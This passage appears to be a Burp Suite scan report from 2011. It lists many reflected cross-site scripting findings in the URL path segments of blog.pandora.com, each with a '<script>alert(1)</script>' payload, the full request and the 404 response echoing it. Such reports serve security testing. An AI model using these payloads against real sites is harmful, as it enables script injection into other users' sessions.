<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)</script>9fa19fe371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)</script>3ce6ddf7419 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)</script>0ef2d728dc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)</script>d313a9d9657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)</script>d3dbd7d1589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)</script>d4489f6734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)</script>b8b28cef3de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)</script>4daafa849f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)</script>47d2dc5e8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)</script>db5c6120320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>31ac4934856 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)</script>81afb429dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 351
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)</script>4df760a3378 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)</script>d9de8f83c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)</script>f85b07012ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)</script>6fe976a7326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)</script>d255db79943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
